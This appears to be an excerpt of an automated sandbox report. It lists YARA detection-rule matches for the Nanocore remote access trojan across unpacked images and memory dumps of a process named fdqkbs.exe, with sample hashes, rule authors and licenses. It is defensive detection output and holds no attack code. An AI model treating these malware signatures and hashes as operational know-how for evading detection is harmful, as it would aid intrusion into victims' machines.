      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
